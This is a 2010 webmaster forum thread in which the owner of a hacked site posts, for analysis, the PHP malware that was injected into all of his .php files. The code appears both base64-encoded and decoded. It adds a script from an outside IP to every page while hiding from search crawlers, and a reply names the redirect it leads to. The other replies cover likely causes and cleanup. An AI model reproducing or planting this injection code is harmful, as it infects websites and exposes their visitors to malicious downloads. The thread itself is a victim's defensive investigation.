1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

One of my sites was hacked. I'm looking for help to find out the reason.

Discussion in 'PHP' started by BurritoWeed, Apr 21, 2010.

  1. #1
    Greetings.

    It seems a hacker got access to my server or ftp account and he ran a script that put a piece of ENCODE PHP code at the beginning of all .php files in my server. I'm looking for help to interpret this code DECODED.

    The ENCODED PHP code is this one:
    SEMrush
    
    <?php /**/ eval(base64_decode("z	siSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk4Mk1TNDBMamd5TGpJeE1pOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
    
    PHP:
    This code DECODED is this PHP script:

    
    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){       return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly82MS40LjgyLjIxMi9qcy5waHAiPjwvc2NyaXB0Pg==");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }
    
    PHP:
    Someone expert in PHP and Security could please help me to find out what this script do? What's the target of this PHP code DECODED?

    Thanks a lot for any help!!! :)
     
    BurritoWeed, Apr 21, 2010 IP
    SEMrush
  2. digitalpoint

    digitalpoint Overlord of no one Staff

    Messages:
    38,263
    Likes Received:
    2,595
    Best Answers:
    460
    Trophy Points:
    710
    Digital Goods:
    29
    #2
    The biggest thing is does it insert this:

    <script src="http://61.4.82.212/js.php"></script>
    Code (markup):
    That ultimately redirects the user to here:

    http://www1.fastfullfind22p.xorg.pl?p=p52dcWpkbG6HjsbIo21wiXNe0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8%2FUoKebWqas0GrEYWiaj5qUlZZoYlzY1cStp6d2ZV6ldV%2FVltjSlm1TmpukyWqIppnLpKCKzKF0aWuTlJVnZGZvYmplbF%2FTksqjV6SgcWNqm16bYmCZYJSK16Rpb2eXmJRyZGRsZ2lam5yegreMqJmRcWpxnA%3D%3D
    Code (markup):
    Which is some crap that tries to trick users into installing something on their computer.
     
    digitalpoint, Apr 22, 2010 IP
  3. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Really thanks for your help DigitalPoint.

    I already deleted this piece of code from all my .php files. It just was activated like 2 hours yesterday. I redirected my site with 505 error and stopped searchers crawling with robots.txt while I deleted the code in all .php files.

    So, I shouldn't be worry too much about the impact it could had?

    Do you think the person who did this misdemeanor had access directly to my FTP account or probably it was caused by a Folder Permissions vulnerability?

    Thanks newly! :)

    By the way, that URL shows my a 404 Not Found.

    
    http://www1.fastfullfind22p.xorg.pl?p=p52dcWpkbG6HjsbIo21wiXNe0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8%2FUoKebWqas0GrEYWiaj5qUlZZoYlzY1cStp6d2ZV6ldV%2FVltjSlm1TmpukyWqIppnLpKCKzKF0aWuTlJVnZGZvYmplbF%2FTksqjV6SgcWNqm16bYmCZYJSK16Rpb2eXmJRyZGRsZ2lam5yegreMqJmRcWpxnA%3D%3D
    
    Code (markup):
     
    BurritoWeed, Apr 22, 2010 IP
  4. SEOibiza

    SEOibiza Peon

    Messages:
    1,198
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    0
    #4
    we had a couple of WP sites done with this same thing last night, all sites in that hosting package were done the same.

    is your site on WP too? wondering whether its a plugin vulnerability or they dont care what type of site it was.

    also who is yours hosted with? there are on godaddy.
     
    SEOibiza, Apr 22, 2010 IP
  5. digitalpoint

    digitalpoint Overlord of no one Staff

    Messages:
    38,263
    Likes Received:
    2,595
    Best Answers:
    460
    Trophy Points:
    710
    Digital Goods:
    29
    #5
    Not sure where your vulnerability was... but if you are running WordPress, that's a good place to look.
     
    digitalpoint, Apr 22, 2010 IP
  6. kmofo

    kmofo Active Member

    Messages:
    442
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    85
    #6
    One of the reasons this happened might be that you have a trojan/virus on your pc. That trojan might have stolen your ftp user/pass(this scenario happens a lot lately and it's as probable as a server side vulnerability). To be sure, change your credentials using a different (clean) computer!
     
    kmofo, Apr 22, 2010 IP
  7. SEOibiza

    SEOibiza Peon

    Messages:
    1,198
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    0
    #7
    possible of course but seems unlikely given the security on the PCs here, and the fact that it's only one hosting package (hopefully, stays that way :) ) out of many many that get accessed from here.
     
    SEOibiza, Apr 22, 2010 IP
  8. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    Good Day SEOIbiza. My site is a webpage. No frameworks.
     
    BurritoWeed, Apr 22, 2010 IP
  9. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    I'm using GoDaddy, the weird thing is, this happened when I wasn't at home. I was one week without turn on the PC where I use to work.
     
    BurritoWeed, Apr 22, 2010 IP
  10. Zeokat

    Zeokat Member

    Messages:
    35
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    46
    #10
    Check server logs, ftp log, etc... that can help to find where is the problem.
    Anyways first movement is clean all php files and change all passwords (ftp, wordpress admin, etc...).

    Hope it helps.
     
    Zeokat, Apr 22, 2010 IP
  11. naphets66

    naphets66 Well-Known Member

    Messages:
    78
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    123
    #11
    It has to be an issue with GoDaddy. I have been round and round. I have found Wordpress blogs, phpBB forums and Pligg installations with the infection. The only common denominator so far is GoDaddy. Is your IP 97.74.215.82 or anything close?
    Mine got hit last week and then again this week.
    More info:
    http://community.godaddy.com/groups/go-daddy-customers/forum/topic/malware-infection/
    http://www.quatloos.com/Q-Forum/viewtopic.php?f=20&p=92769
    http://forums.pligg.com/questions-comments/21128-new-pligg-virus.html
     
    naphets66, Apr 22, 2010 IP
  12. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #12
    Thanks everybody for all your help!!! Well.. this seems to be a GoDaddy problem I'm some agree. They are my hosting provider. I contacted them and this is their answer:

    Naphets my ip isn't close to that one.. it is 68.178.2..

    I noticed that this malware script leaved some files and permission folders with 777 mode.. making them vulnerable again.. I changed all folders to 754 and files to 654 and my ftp password for 14 digits with symbols,nums,cap. letters, etc.... I hope this helps to avoid this attach again.

    If someone has more info about this or any contribution I will appreciate it! Thanks newly!
     
    BurritoWeed, Apr 22, 2010 IP
  13. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #13
    By the way, I read somewhere "do not leave your FTP password in your FTP program, for example FireFTP and others...".. I think It could help to avoid attacks!
     
    BurritoWeed, Apr 22, 2010 IP
  14. lukeg32

    lukeg32 Peon

    Messages:
    645
    Likes Received:
    19
    Best Answers:
    1
    Trophy Points:
    0
    #14
    Any software with any credibility would not store it as plain text.... but what does it matter;

    a) if you had to type it in; keyloggers
    b) FTP sends your details as plain text (username & password) anyway
     
    lukeg32, Apr 22, 2010 IP
  15. stalecache

    stalecache Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    I also discovered one of my sites infected with this. Site is wordpress running on godaddy shared hosting too.

    I 'warded' it off for now by replacing the "</body>" with "<script>document.write("<"+"/"+"bo"+""+"dy"+">");</script>".
     
    stalecache, Apr 22, 2010 IP
  16. SEOibiza

    SEOibiza Peon

    Messages:
    1,198
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    0
    #16
    lol, i got the standard "fob off" letter too, "its nothing to do with us" type of thing.. wankers.

    Im sure its a Godaddy issue too. because of the variety of different sites its not a WP plugin vulnerability and Godaddy are the only host affected.
     
    SEOibiza, Apr 23, 2010 IP
  17. alistair80

    alistair80 Well-Known Member

    Messages:
    1,868
    Likes Received:
    59
    Best Answers:
    0
    Trophy Points:
    185
    #17
    Has anyone been able to fix this js on footer issue on WP? This seems to be a massive attack ...a Chinese hacking script for WP...but if you have other sites in the same server as you WP blog, it infects them too...
     
    alistair80, Apr 24, 2010 IP
  18. Kairos

    Kairos Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #18
    Just got infected today. I've a Drupal site hosted at GoDaddy and discovered the problem this morning. I checked my files, and found that all .php files had the "eval(base64_decode" line at the beginning.

    I simply resent all the files by FTP and site went back to normal, although it does not solve the problem, as I still don't know how the files were changed and what kind of exploit was used.
     
    Kairos, Apr 28, 2010 IP
  19. Kairos

    Kairos Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #19
    Definitely a GoDaddy problem. My Drupal site is hosted at address 72.167.131.105 (p3slh172.shr.phx3.secureserver.net) and was hit this morning.

    I reviewed the HTTP logs from 22 to 28/04 and there is no trace of any attack. But being on a shared hosting plan, I can't have access to the server logs.
     
    Kairos, Apr 28, 2010 IP
  20. alistair80

    alistair80 Well-Known Member

    Messages:
    1,868
    Likes Received:
    59
    Best Answers:
    0
    Trophy Points:
    185
    #20
    It's a godaddy issue! I am glad I cancelled my hosting with em...The worst part is that they dont / wont do anything about it nor do they have a security team that deals with this type of issues unlike gator. I'd suggest SCAN you pc with panda internet security...probably the ONLY antivirus that'd be able to track that spyware in your system. Get the free evaluation version (if you dont want to spend on that purchse right away) and scan your pc to begin with and then change all your passwords// username from another secured pc. Then only you can worry about fixing the issue. It'd require a mass cleanup...and do take a look at the files that aint necessarily php...Something triggers that infection!

    It's a WP hack script from China...but looks like it affects other cms too. I know some guys who can fix the issue in case you're lost!
     
    alistair80, Apr 28, 2010 IP